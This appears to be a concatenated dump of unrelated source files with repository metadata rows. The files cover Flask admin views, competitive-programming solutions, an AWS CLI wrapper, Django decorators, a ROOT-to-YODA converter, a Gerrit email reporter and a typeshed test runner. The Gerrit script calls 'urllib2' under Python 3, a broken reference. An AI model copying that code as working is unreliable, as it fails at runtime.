    and with the auth ``token`` re-attached when present)."""
    carried_args = dict(request.args)
    carried_args.pop('page', None)
    bound = partial(url_for, **carried_args)
    if 'token' not in request.args:
        return bound
    return partial(bound, token=request.args['token'])
def create_query_params(**kwargs):
    """Build a UsesQueryParams from the request's query string.

    String filters are taken verbatim; dates must be ``YYYY-MM-DD`` and
    ``page`` must be a positive integer (invalid values are silently
    ignored).  Explicit ``kwargs`` override anything parsed from the
    request.  The database is then queried once for metadata so the result
    also carries ``count`` and the effective ``min_date``/``max_date``.
    """
    params = {}
    # Plain string filters, copied through unchanged.
    for potential_arg in 'login', 'experiment_name', 'category_name', 'ip', 'country':
        if potential_arg in request.args:
            params[potential_arg] = request.args[potential_arg]
    # Date filters: ignore values that do not parse as YYYY-MM-DD.
    for potential_arg in 'start_date', 'end_date':
        if potential_arg in request.args:
            try:
                params[potential_arg] = datetime.datetime.strptime(request.args[potential_arg], "%Y-%m-%d").date()
            except ValueError:
                pass
    # Page number: ignore non-integers, and clamp to 1 below.
    for potential_arg in 'page',:
        if potential_arg in request.args:
            try:
                params[potential_arg] = int(request.args[potential_arg])
            except ValueError:
                pass
    if 'page' not in params or params['page'] <= 0:
        params['page'] = 1
    # Date precision: only the four known granularities are accepted.
    for potential_arg in 'date_precision',:
        if potential_arg in request.args:
            if request.args[potential_arg] in ('day', 'month', 'year', 'week'):
                params[potential_arg] = request.args[potential_arg]
    if 'date_precision' not in params:
        params['date_precision'] = 'month'
    # Caller-supplied values win over anything parsed from the request.
    params.update(kwargs)
    query_params = UsesQueryParams(**params)
    metadata = weblab_api.db.quickadmin_uses_metadata(query_params)
    params['count'] = metadata['count']
    # Effective date range: explicit filter if given, else the DB extremes.
    if 'start_date' in params:
        params['min_date'] = params['start_date']
    else:
        params['min_date'] = metadata['min_date']
    if 'end_date' in params:
        params['max_date'] = params['end_date']
    else:
        params['max_date'] = metadata['max_date']
    return UsesQueryParams(**params)
@weblab_api.route_web('/quickadmin/')
@check_credentials
def index():
    # Landing page: just renders the menu template with link-building helper.
    return render_template("quickadmin/index.html", url_for = get_url_for())
# Page size for all paginated listings below.
LIMIT = 20
@weblab_api.route_web('/quickadmin/uses')
@check_credentials
def uses():
    # Paginated table of experiment uses matching the query-string filters.
    query_params = create_query_params()
    uses = weblab_api.db.quickadmin_uses(LIMIT, query_params)
    return render_template("quickadmin/uses.html", limit = LIMIT, uses = uses, filters = query_params.filterdict(), arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Uses', endpoint = '.uses')
@weblab_api.route_web('/quickadmin/use/<int:use_id>')
@check_credentials
def use(use_id):
    # Detail page for a single experiment use; the DB helper returns the
    # template's keyword arguments directly.
    return render_template("quickadmin/use.html", param_url_for = get_url_for(), **weblab_api.db.quickadmin_use(use_id = use_id))
@weblab_api.route_web('/quickadmin/file/<int:file_id>')
@check_credentials
def file(file_id):
    # Download a file stored for a use.  (The view name shadows the Python 2
    # builtin ``file``; harmless here since the builtin is never used.)
    file_path = weblab_api.db.quickadmin_filepath(file_id = file_id)
    if file_path is None:
        return "File not found", 404
    return send_file(file_path, as_attachment = True)
@weblab_api.route_web('/quickadmin/uses/map')
@check_credentials
def uses_map():
    # World-map view: per-country totals plus per-country time series
    # converted to the d3-friendly structure.
    query_params = create_query_params()
    per_country = weblab_api.db.quickadmin_uses_per_country(query_params)
    per_time = _per_country_by_to_d3(weblab_api.db.quickadmin_uses_per_country_by(query_params))
    return render_template("quickadmin/uses_map.html", per_country = per_country, per_time = per_time, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Uses map', endpoint = '.uses_map')
@weblab_api.route_web('/quickadmin/demos')
@check_credentials
def demos():
    # Same listing as uses(), but restricted to the groups that external
    # (demo) users are placed in by configuration.
    group_names = weblab_api.config.get_value('login_default_groups_for_external_users', [])
    query_params = create_query_params(group_names = group_names)
    uses = weblab_api.db.quickadmin_uses(LIMIT, query_params)
    return render_template("quickadmin/uses.html", limit = LIMIT, uses = uses, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Demo uses', endpoint = '.demos')
@weblab_api.route_web('/quickadmin/demos/map')
@check_credentials
def demos_map():
    # Map view restricted to demo-user groups (see demos() above).
    group_names = weblab_api.config.get_value('login_default_groups_for_external_users', [])
    query_params = create_query_params(group_names = group_names)
    per_country = weblab_api.db.quickadmin_uses_per_country(query_params)
    per_time = _per_country_by_to_d3(weblab_api.db.quickadmin_uses_per_country_by(query_params))
    return render_template("quickadmin/uses_map.html", per_country = per_country, per_time = per_time, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Demo uses map', endpoint = '.demos_map')
def _per_country_by_to_d3(per_time):
    """Convert ``{country: [(time_key, count), ...]}`` into the structure the
    d3 time-series chart expects.

    ``time_key`` is a tuple: ``(year,)``, ``(date,)`` or ``(year, month)``.
    Only the 10 countries with the highest totals are kept, and every kept
    series is padded with zeroes so all series share the same time axis.

    Returns a dict with:
      - ``key_used``: granularity seen ('day', 'month' or 'year')
      - ``per_time``: [{'key': country, 'values': [[epoch_millis, count], ...]}]
      - ``max_value``: largest total among the kept countries (0 if empty)
    """
    new_per_time = []
    # Total uses per country, then pick the top 10 by total.
    total_per_country = []
    for country in per_time:
        total_per_country.append( (country, sum([ value for key, value in per_time[country] ]) ))
    # Bug fix: the original passed a cmp-style comparator positionally, which
    # only works on Python 2 (``cmp`` and the cmp argument are gone in 3);
    # an equivalent ``key=`` sort works on both and is stable either way.
    total_per_country.sort(key = lambda entry: entry[1], reverse = True)
    top_countries = [ country for country, value in total_per_country[:10] ]
    max_value = max([value for country, value in total_per_country[:10] ] or [0])
    # Collect every time key seen in the top countries, indexed by its
    # epoch-milliseconds representation (the chart's x value).
    key_used = 'month'
    times_in_millis = {
        # millis : time_key
    }
    for country in top_countries:
        for key in [ key for key, value in per_time[country] ]:
            if len(key) == 1:
                if isinstance(key[0], datetime.date):
                    key_used = 'day'
                    date_key = key[0]
                else:
                    key_used = 'year'
                    date_key = datetime.date(year = key[0], month = 1, day = 1)
            elif len(key) == 2:
                key_used = 'month'
                date_key = datetime.date(year = key[0], month = key[1], day = 1)
            else:
                continue
            time_in_millis = calendar.timegm(date_key.timetuple()) * 1000
            times_in_millis[time_in_millis] = key
    # Build one series per kept country, filling gaps with zero counts so
    # every series covers the full time axis.
    for country in per_time:
        if country not in top_countries:
            continue
        country_data = {'key' : country, 'values' : []}
        country_time_data = dict(per_time[country])
        for time_in_millis in sorted(times_in_millis):
            key = times_in_millis[time_in_millis]
            value = country_time_data.get(key, 0)
            country_data['values'].append([time_in_millis, value])
        new_per_time.append(country_data)
    return { 'key_used' : key_used, 'per_time' : new_per_time, 'max_value' : max_value}
| [
"[email protected]"
]
| |
a463d23256ed3b7f0178434ea5256ff915ef0430 | 4bb1a23a62bf6dc83a107d4da8daefd9b383fc99 | /work/abc034_d2.py | 4afb3860d7f983c4de267f774fec7425d98c023d | []
| no_license | takushi-m/atcoder-work | 0aeea397c85173318497e08cb849efd459a9f6b6 | f6769f0be9c085bde88129a1e9205fb817bb556a | refs/heads/master | 2021-09-24T16:52:58.752112 | 2021-09-11T14:17:10 | 2021-09-11T14:17:10 | 144,509,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | n,k = map(int, input().split())
wpl = [list(map(int, input().split())) for _ in range(n)]
def f(w,p,x):
    """Contribution of an item with weight ``w`` and percentage ``p`` when the
    candidate overall ratio is ``x`` (positive iff the item raises it)."""
    rate = p/100
    return rate*w - w*x
def check(x):
    # Feasibility test for ratio x: take each item's contribution f(w, p, x),
    # keep the k largest, and require their sum to be non-negative.
    # Reads the module-level n, k and wpl.
    l = [f(wpl[i][0], wpl[i][1], x) for i in range(n)]
    l.sort(reverse=True)
    return sum(l[:k])>=0
# Binary search the largest feasible ratio in [0, 1); check() is monotone in
# x, so bisect to 1e-7 precision and print the answer as a percentage.
ok = 0
ng = 1
while abs(ng-ok)>10**-7:
    mid = (ok+ng)/2
    if check(mid):
        ok = mid
    else:
        ng = mid
print(ok*100)
"[email protected]"
]
| |
061e1a704629d8949be1743454ac0c89316349fb | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/agc025/C/2618079.py | c2927f9e67892662b56299b7a9fff478e70376c2 | []
| no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | n = int(input())
l = []
r = []
for i in range(n):
lt, rt = map(int,input().split())
l.append(lt)
r.append(rt)
l.append(0)
r.append(0)
l.sort()
r.sort()
l.reverse()
ans = 0
i = 0
while r[i]<l[i]:
ans += 2*(l[i] - r[i])
i+=1
print(ans) | [
"[email protected]"
]
| |
594eaa6cce6464e3ce1165188820b67175525a11 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /opsworks_write_f/rds-db-instance_update.py | 3257b4557a10fe6a781cb6c9086bdfa3b85a8b86 | []
| no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
# NOTE(review): the coding cookie above is misspelled ("codding"), so Python
# ignores it and uses the default source encoding -- confirm that is intended.
import os
import sys
# Make the repository root importable so the ``common`` package resolves.
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
    """
    deregister-rds-db-instance : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/deregister-rds-db-instance.html
    describe-rds-db-instances : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/describe-rds-db-instances.html
    register-rds-db-instance : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/register-rds-db-instance.html
    """
    # Collect parameters for, and invoke, ``aws opsworks update-rds-db-instance``.
    write_parameter("opsworks", "update-rds-db-instance")
"[email protected]"
]
| |
766973ba9748fa74c5378e42398721badd887cf3 | 2612f336d667a087823234daf946f09b40d8ca3d | /python/lib/Lib/site-packages/django/utils/decorators.py | 17f2ea30b337f624c0f984698e31aebbb19f6d37 | [
"Apache-2.0"
]
| permissive | tnorbye/intellij-community | df7f181861fc5c551c02c73df3b00b70ab2dd589 | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | refs/heads/master | 2021-04-06T06:57:57.974599 | 2018-03-13T17:37:00 | 2018-03-13T17:37:00 | 125,079,130 | 2 | 0 | Apache-2.0 | 2018-03-13T16:09:41 | 2018-03-13T16:09:41 | null | UTF-8 | Python | false | false | 4,290 | py | "Functions that help with dynamically creating decorators for views."
try:
from functools import wraps, update_wrapper, WRAPPER_ASSIGNMENTS
except ImportError:
from django.utils.functional import wraps, update_wrapper, WRAPPER_ASSIGNMENTS # Python 2.4 fallback.
class classonlymethod(classmethod):
    """Like ``classmethod``, but refuses to be accessed via an instance."""

    def __get__(self, instance, owner):
        if instance is None:
            return super(classonlymethod, self).__get__(instance, owner)
        raise AttributeError("This method is available only on the view class.")
def method_decorator(decorator):
    """
    Converts a function decorator into a method decorator.

    The returned decorator wraps a method so that, at call time, a bound
    version of it (without the explicit ``self`` argument) is passed to
    ``decorator`` -- letting decorators written for plain functions work on
    methods unchanged.
    """
    # 'func' is a function at the time it is passed to _dec, but will eventually
    # be a method of the class it is defined in.
    def _dec(func):
        def _wrapper(self, *args, **kwargs):
            @decorator
            def bound_func(*args2, **kwargs2):
                return func(self, *args2, **kwargs2)
            # bound_func has the signature that 'decorator' expects i.e. no
            # 'self' argument, but it is a closure over self so it can call
            # 'func' correctly.
            return bound_func(*args, **kwargs)
        # In case 'decorator' adds attributes to the function it decorates, we
        # want to copy those. We don't have access to bound_func in this scope,
        # but we can cheat by using it on a dummy function.
        @decorator
        def dummy(*args, **kwargs):
            pass
        update_wrapper(_wrapper, dummy)
        # Need to preserve any existing attributes of 'func', including the name.
        update_wrapper(_wrapper, func)
        return _wrapper
    update_wrapper(_dec, decorator)
    # Change the name to aid debugging.
    _dec.__name__ = 'method_decorator(%s)' % decorator.__name__
    return _dec
def decorator_from_middleware_with_args(middleware_class):
    """
    Like decorator_from_middleware, but returns a function
    that accepts the arguments to be passed to the middleware_class
    constructor (the middleware is instantiated per decoration).
    Use like::
         cache_page = decorator_from_middleware_with_args(CacheMiddleware)
         # ...
         @cache_page(3600)
         def my_view(request):
             # ...
    """
    return make_middleware_decorator(middleware_class)
def decorator_from_middleware(middleware_class):
    """
    Given a middleware class (not an instance), returns a view decorator. This
    lets you use middleware functionality on a per-view basis. The middleware
    is created with no params passed.
    """
    # Note the trailing call: the middleware is instantiated immediately with
    # no constructor arguments, unlike decorator_from_middleware_with_args.
    return make_middleware_decorator(middleware_class)()
def available_attrs(fn):
    """Return the subset of functools' WRAPPER_ASSIGNMENTS that ``fn``
    actually has, as a tuple.

    Works around http://bugs.python.org/issue3445: functools.wraps fails on
    callables missing some of the standard attributes.
    """
    present = []
    for attr in WRAPPER_ASSIGNMENTS:
        if hasattr(fn, attr):
            present.append(attr)
    return tuple(present)
def make_middleware_decorator(middleware_class):
    # Factory shared by decorator_from_middleware(_with_args): builds a
    # decorator-maker that instantiates the middleware once and then runs a
    # view through the middleware's hooks in the standard order:
    # process_request -> process_view -> view -> process_exception (on error)
    # -> process_response.  The first hook returning non-None short-circuits.
    def _make_decorator(*m_args, **m_kwargs):
        middleware = middleware_class(*m_args, **m_kwargs)
        def _decorator(view_func):
            def _wrapped_view(request, *args, **kwargs):
                if hasattr(middleware, 'process_request'):
                    result = middleware.process_request(request)
                    if result is not None:
                        return result
                if hasattr(middleware, 'process_view'):
                    result = middleware.process_view(request, view_func, args, kwargs)
                    if result is not None:
                        return result
                try:
                    response = view_func(request, *args, **kwargs)
                except Exception, e:
                    # Give the middleware a chance to turn the exception into
                    # a response; otherwise re-raise it unchanged.
                    if hasattr(middleware, 'process_exception'):
                        result = middleware.process_exception(request, e)
                        if result is not None:
                            return result
                    raise
                if hasattr(middleware, 'process_response'):
                    result = middleware.process_response(request, response)
                    if result is not None:
                        return result
                return response
            return wraps(view_func, assigned=available_attrs(view_func))(_wrapped_view)
        return _decorator
    return _make_decorator
| [
"[email protected]"
]
| |
e1a24bee538f55419b12446f7f37bc4f25bc8e38 | 03c8d75d11dd34a253d265ce5b44bf7984311bab | /root2yoda | ddf417c19d865e0e7c684d83a4ebafd3e9738188 | []
| no_license | raggleton/QGAnalysisRIVET | e8a57fbfa1380e1c67365b0d5a944119f715813b | 0703bdf81bf27f5fc91d8eedb6e44651d978749a | refs/heads/master | 2021-06-08T19:29:53.683282 | 2021-04-06T07:22:56 | 2021-04-06T07:22:56 | 142,179,672 | 0 | 1 | null | 2020-11-03T17:19:58 | 2018-07-24T15:40:48 | Gnuplot | UTF-8 | Python | false | false | 1,656 | #! /usr/bin/env python
"""\
%prog rootfile [yodafile]
Convert a ROOT data file to the YODA data format.
"""
import yoda, os, sys, optparse
from yoda.script_helpers import parse_x2y_args, filter_aos
parser = optparse.OptionParser(usage=__doc__)
parser.add_option("-m", "--match", dest="MATCH", metavar="PATT", default=None,
help="Only write out histograms whose path matches this regex")
parser.add_option("-M", "--unmatch", dest="UNMATCH", metavar="PATT", default=None,
help="Exclude histograms whose path matches this regex")
opts, args = parser.parse_args()
in_out = parse_x2y_args(args, ".root", ".yoda")
if not in_out:
sys.stderr.write("You must specify the ROOT and YODA file names\n")
sys.exit(1)
import ROOT
for i, o in in_out:
print "opening", i
rf = ROOT.TFile(i)
rootobjects_raw = list(yoda.root.getall(rf))
rootobjects = [(path, ro) for (path, ro) in rootobjects_raw if not isinstance(ro, ROOT.TH1F)]
th1f = [(path, ro) for (path, ro) in rootobjects_raw if isinstance(ro, ROOT.TH1F)]
print rootobjects
print th1f
# Conversion of TH1F into TH1D
for path, ro in th1f:
temp = ROOT.TH1D()
ro.Copy(temp)
rootobjects.append((path, temp))
def to_yoda(path, ro):
print path, ro
ao = yoda.root.to_yoda(ro)
ao.path = path
return ao
analysisobjects = [to_yoda(path, ro) for (path, ro) in rootobjects]
rf.Close()
analysisobjects = [ao for ao in analysisobjects if ao is not None]
filter_aos(analysisobjects, opts.MATCH, opts.UNMATCH)
yoda.writeYODA(analysisobjects, o)
| [
"[email protected]"
]
| ||
e0b51af08de583fc6d2449bff3c69e61e59ce414 | 3f3f2b3eaab992d3cc8f49fcd03e4824a11fddab | /diamond.releng.jenkins/job.scripts/email_owners_of_submittable_changes.py | 7bfd821419fa2722938f0131ed624a2ce5f2ba3e | []
| no_license | DiamondLightSource/diamond-releng | 7bff1926e3fd2f9df3c056d8af5521b4e74aaf41 | ba15336e7f7d3c160d3c3bc28316817cb4585305 | refs/heads/master | 2021-01-25T03:19:25.403769 | 2019-01-02T16:05:28 | 2019-01-02T16:05:28 | 19,986,689 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,159 | py | #!/usr/bin/env python3
###
### Requires Python 3
###
'''
Identify Gerrit changes that are ready to submit, and email the owners
'''
from email.message import EmailMessage
from email.headerregistry import Address
import datetime
import itertools
import json
import logging
import operator
import os
import os.path
import smtplib
import stat
import sys
import time
import urllib.request
import urllib.parse
import urllib.error
GERRIT_HOST = 'gerrit.diamond.ac.uk'
# Module-wide logger; a handler is attached by setup_logging().
logger = logging.getLogger(__name__)
def setup_logging():
    """Attach a console handler with a timestamped format and set INFO level."""
    console = logging.StreamHandler()
    console.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S"))
    logger.addHandler(console)
    # Switch the level to logging.DEBUG when tracing Gerrit traffic.
    logger.setLevel(logging.INFO)
class SubmittableChangesProcessor():
def __init__(self):
setup_logging()
self.logger = logger
self.gerrit_url_base = 'https://' + GERRIT_HOST + '/' # when using the REST API, this is the base URL to use
self.gerrit_url_browser = self.gerrit_url_base # when generating links, this is the base URL to use
# since the Gerrit REST API has been secured, then we need to use basic authentication
self.gerrit_url_base += 'a/'
handler = urllib2.HTTPBasicAuthHandler()
handler.add_password('Gerrit Code Review', self.gerrit_url_base, *self.get_gerrit_http_username_password())
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
    @staticmethod
    def get_gerrit_http_username_password():
        ''' the token required to authenticate to Gerrit is stored in a file
            the file, in addition to comment and empty lines, contains a single line of the format
                username:password
            Returns [username, password]; raises if the file has no such line.
            The file must be a regular file readable only by its owner (mode
            0400 exactly) -- deliberately strict, since it holds a credential.
        '''
        token_filename = os.path.abspath(os.path.expanduser('~/passwords/http-password_Gerrit_for-REST.txt'))
        assert os.path.isfile(token_filename)
        assert os.stat(token_filename).st_mode == stat.S_IRUSR + stat.S_IFREG # permissions must be user-read + regular-file
        # Keep only the last non-empty line, so comments/blank lines above it
        # are ignored.
        last_nonempty_line = ''
        with open(token_filename, 'r') as token_file:
            for line in token_file: # standard OS terminator is converted to \n
                line = line.rstrip('\n') # remove trailing newline
                if line:
                    last_nonempty_line = line
        if last_nonempty_line:
            # Split only on the first colon: passwords may contain colons.
            return last_nonempty_line.split(':', 1)
        raise Exception('File %s appears empty' % token_filename)
    def gerrit_REST_api(self, relative_url, accept404=False):
        ''' Call the Gerrit REST API and return the decoded JSON response.

            relative_url -- path relative to the authenticated API base URL
            accept404    -- if True, a 404 response is logged at debug level
                            instead of critical (still returns None)
            Returns the parsed JSON, or None on any HTTP or format error.
        '''
        url = self.gerrit_url_base + relative_url
        request = urllib.request.Request(url, headers={'Accept': 'application/json', 'Accept-Charset': 'utf-8'}) # header specifies compact json, which is more efficient
        self.logger.debug('gerrit_REST_api retrieving: %s' % (url,))
        try:
            rest_json = urllib.request.urlopen(request).read()
        except (urllib.error.HTTPError) as err:
            if accept404 and (err.code == 404):
                self.logger.debug('Invalid response from Gerrit server reading %s: %s' % (url, err))
                return None
            self.logger.critical('Invalid response from Gerrit server reading %s: %s' % (url, err))
            return None
        # Gerrit prefixes all JSON responses with a magic line to defeat XSSI;
        # it must be present and is stripped before parsing.
        gerrit_magic_prefix_line = b")]}'\n"
        if not rest_json[:len(gerrit_magic_prefix_line)] == gerrit_magic_prefix_line:
            self.logger.critical('Invalid response from Gerrit server reading %s: magic prefix line not found' % (url,))
            return None
        standard_json = json.loads(rest_json[len(gerrit_magic_prefix_line):].decode('utf-8')) # strip off the magic prefix line returned by Gerrit
        # self.logger.debug(json.dumps(standard_json, indent=2))
        return standard_json
def get_submittable_changes_from_gerrit(self):
''' Queries Gerrit to get a list of ChangeInfo records for the changes that can be submitted
'''
url = 'changes/?q=%s&o=CURRENT_REVISION&o=DETAILED_ACCOUNTS' % (urllib.parse.quote('is:open label:Code-Review+2 label:Verified+1 NOT label:Code-Review-2 NOT label:Verified-1'),)
changeinfos = self.gerrit_REST_api(url)
longest_string = {}
longest_string['_number'] = max(itertools.chain((len(str(ci['_number'])) for ci in changeinfos), (len('Change'),)))
longest_string['project'] = max(itertools.chain((len(ci['project']) for ci in changeinfos), (len('Project'),)))
longest_string['branch'] = max(itertools.chain((len(ci['branch']) for ci in changeinfos), (len('Branch'),)))
longest_string['owner'] = max(itertools.chain((len(ci['owner']['name']) for ci in changeinfos), (len('Owner'),)))
format = ('%' + str(longest_string['_number']) + 's ' +
'%-' + str(longest_string['project']) + 's ' +
'%-' + str(longest_string['branch']) + 's ' +
'%-' + str(longest_string['owner']) + 's ' +
'%-16s ' + # for the time last updated
'%s\n') # for the subject
emails = set()
report = format % ('Change', 'Project', 'Branch', 'Owner', 'Updated', 'Subject')
# use a sort key that transforms [email protected] to lastname.firstname
for ci in sorted(changeinfos, key=lambda ci:
'.'.join(operator.itemgetter(2,0)(ci['owner']['email'].partition('@')[0].lower().partition('.'))) +
os.path.basename(ci['project'])): # there can be multiple changeinfos
report += format % (ci['_number'], ci['project'], ci['branch'], ci['owner']['name'], ci['updated'][:16], ci['subject'])
emails.add(ci['owner']['email'])
self.emails = sorted(emails)
self.report = report
return
def make_email(self):
    """Build the reminder email from self.report / self.emails and send it
    through the local SMTP relay. Returns the sent EmailMessage.
    """
    body = 'Below is a list of changes in Gerrit that have been verified and reviewed, but are still waiting for the change owner to submit them' + \
           ', as of ' + time.strftime("%a, %Y/%m/%d %H:%M:%S %Z") + '.\n'
    # Fix: "it you still want it" -> "if you still want it" (typo in user-facing text).
    body += '''
PLEASE CONSIDER EITHER:
Submit your change, if you still want it
Abandon your change, if it is no longer required
'''
    body += self.report
    body += '\n<<end report>>\n'
    # we are going to create an email message with ASCII characters, so convert any non-ASCII ones
    # note that this is really a hack, we should be smarter about constructing an email message
    body = body.replace("\u2019", "'").replace('\u201c', '"').replace('\u201d', '"')
    message = EmailMessage()
    message['Subject'] = 'Report on Gerrit changes waiting for the owner to submit'
    message['From'] = Address('Jenkins Build Server (Diamond Light Source)', '[email protected]')
    message['List-Id'] = 'Gerrit awaiting submit <gerrit-awaiting-submit.jenkins.diamond.ac.uk>'
    # use a sort key that transforms first.last@example.com to lastname.firstname
    message['To'] = [Address(addr_spec=committer) for committer in sorted(
        self.emails,
        key=lambda email_addr: '.'.join(operator.itemgetter(2, 0)(email_addr.partition('@')[0].lower().partition('.')))
        ) if '@' in committer]
    message['CC'] = ('[email protected]',)
    message.set_content(body)
    email_expires_days = 5
    if email_expires_days:
        # Hint to mail clients that the report is stale after a few days.
        message['Expiry-Date'] = (datetime.datetime.utcnow() + datetime.timedelta(days=email_expires_days)).strftime("%a, %d %b %Y %H:%M:%S +0000")
    self.logger.info("Sending email ...")
    with smtplib.SMTP('localhost') as smtp:
        smtp.send_message(message)
    return message
if __name__ == '__main__':
    # Fetch the submittable changes, email the report, and echo it to stdout.
    processor = SubmittableChangesProcessor()
    processor.get_submittable_changes_from_gerrit()
    report_email = processor.make_email()
    print(report_email)
    sys.exit(0)
| [
"[email protected]"
]
| |
44a16f28b318d131dbeefaf200012cfa5e1bd8de | 3395a234e7c80d011607e79c49cd48bf516f256b | /dependencies/jedi/third_party/typeshed/tests/pytype_test.py | ee7ac0bb9cb9d9175b955f913e9188cc8bbc75a2 | [
"MIT",
"Apache-2.0"
]
| permissive | srusskih/SublimeJEDI | 67329b72e184bc9584843968dcc534a002c797a1 | 95c185d778425c04536d53517b0e3fe6dedf8e59 | refs/heads/master | 2023-08-24T11:30:37.801834 | 2022-08-30T09:04:17 | 2022-08-30T09:04:17 | 6,241,108 | 669 | 125 | MIT | 2022-08-30T09:04:18 | 2012-10-16T08:23:57 | Python | UTF-8 | Python | false | false | 7,915 | py | #!/usr/bin/env python3
"""Test runner for typeshed.
Depends on pytype being installed.
If pytype is installed:
1. For every pyi, do nothing if it is in pytype_blacklist.txt.
2. Otherwise, call 'pytype.io.parse_pyi'.
Option two will load the file and all the builtins, typeshed dependencies. This
will also discover incorrect usage of imported modules.
"""
import argparse
import itertools
import os
import re
import subprocess
import traceback
from typing import List, Match, Optional, Sequence, Tuple
from pytype import config as pytype_config, io as pytype_io
TYPESHED_SUBDIRS = ["stdlib", "third_party"]
TYPESHED_HOME = "TYPESHED_HOME"
UNSET = object() # marker for tracking the TYPESHED_HOME environment variable
def main() -> None:
    """Entry point: validate the environment, collect the pyi files, run pytype."""
    cli_args = create_parser().parse_args()
    typeshed_location = cli_args.typeshed_location or os.getcwd()
    subdir_paths = [os.path.join(typeshed_location, subdir) for subdir in TYPESHED_SUBDIRS]
    check_subdirs_discoverable(subdir_paths)
    check_python_exes_runnable(python27_exe_arg=cli_args.python27_exe, python36_exe_arg=cli_args.python36_exe)
    files_to_test = determine_files_to_test(typeshed_location=typeshed_location, subdir_paths=subdir_paths)
    run_all_tests(
        files_to_test=files_to_test,
        typeshed_location=typeshed_location,
        python27_exe=cli_args.python27_exe,
        python36_exe=cli_args.python36_exe,
        print_stderr=cli_args.print_stderr,
        dry_run=cli_args.dry_run,
    )
def create_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for the pytype/typeshed test runner."""
    ap = argparse.ArgumentParser(description="Pytype/typeshed tests.")
    ap.add_argument("-n", "--dry-run", action="store_true", default=False, help="Don't actually run tests")
    # Default to '' so that symlinking typeshed subdirs in cwd will work.
    ap.add_argument("--typeshed-location", type=str, default="", help="Path to typeshed installation.")
    # Set to true to print a stack trace every time an exception is thrown.
    ap.add_argument(
        "--print-stderr", action="store_true", default=False, help="Print stderr every time an error is encountered."
    )
    # We need to invoke python2.7 and 3.6.
    ap.add_argument("--python27-exe", type=str, default="python2.7", help="Path to a python 2.7 interpreter.")
    ap.add_argument("--python36-exe", type=str, default="python3.6", help="Path to a python 3.6 interpreter.")
    return ap
class PathMatcher:
    """Matches relative paths against a set of end-anchored blacklist regexes."""

    def __init__(self, patterns: Sequence[str]) -> None:
        # A single alternation anchored at end-of-string; None means "match nothing".
        if patterns:
            self.matcher = re.compile(r"({})$".format("|".join(patterns)))
        else:
            self.matcher = None

    def search(self, path: str) -> Optional[Match[str]]:
        """Return the match ending at the end of *path*, or None."""
        return self.matcher.search(path) if self.matcher else None
def load_blacklist(typeshed_location: str) -> List[str]:
    """Parse tests/pytype_blacklist.txt: one path per line, '#' comments allowed."""
    path = os.path.join(typeshed_location, "tests", "pytype_blacklist.txt")
    # First non-space, non-'#' token on the line; trailing comments are ignored.
    entry_re = re.compile(r"^\s*([^\s#]+)\s*(?:#.*)?$")
    entries = []
    with open(path) as blacklist_file:
        for raw_line in blacklist_file:
            entry_match = entry_re.match(raw_line)
            if entry_match:
                entries.append(entry_match.group(1))
    return entries
def run_pytype(*, filename: str, python_version: str, python_exe: str, typeshed_location: str) -> Optional[str]:
    """Run pytype on one pyi file; return the formatted traceback on failure, else None."""
    options = pytype_config.Options.create(
        filename,
        module_name=_get_module_name(filename),
        parse_pyi=True,
        python_version=python_version,
        python_exe=python_exe)
    old_typeshed_home = os.environ.get(TYPESHED_HOME, UNSET)
    os.environ[TYPESHED_HOME] = typeshed_location
    stderr = None
    try:
        pytype_io.parse_pyi(options)
    except Exception:
        stderr = traceback.format_exc()
    finally:
        # Fix: restore TYPESHED_HOME in a finally block so the environment is
        # clean even if parse_pyi raises something that is not an Exception
        # (e.g. KeyboardInterrupt), not just on the handled paths.
        if old_typeshed_home is UNSET:
            del os.environ[TYPESHED_HOME]
        else:
            os.environ[TYPESHED_HOME] = old_typeshed_home
    return stderr
def _get_relative(filename: str) -> str:
    """Strip everything before the first typeshed subdir component of *filename*.

    Returns *filename* unchanged when no known subdir appears in it.
    """
    for subdir in TYPESHED_SUBDIRS:
        position = filename.find(subdir)
        if position != -1:
            return filename[position:]
    return filename
def _get_module_name(filename: str) -> str:
    """Converts a filename {subdir}/m.n/module/foo to module.foo."""
    parts = _get_relative(filename).split(os.path.sep)
    dotted = ".".join(parts[2:])  # drop the subdir and the version components
    return dotted.replace(".pyi", "").replace(".__init__", "")
def can_run(exe: str, *, args: List[str]) -> bool:
    """Return True if *exe* can be launched with *args* without an OS-level error."""
    try:
        subprocess.run([exe, *args], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except OSError:
        # Executable missing or not runnable.
        return False
    return True
def _is_version(path: str, version: str) -> bool:
    """True when *path* lies under the given version directory of any typeshed subdir."""
    needles = (os.path.join(subdir, version) for subdir in TYPESHED_SUBDIRS)
    return any(needle in path for needle in needles)
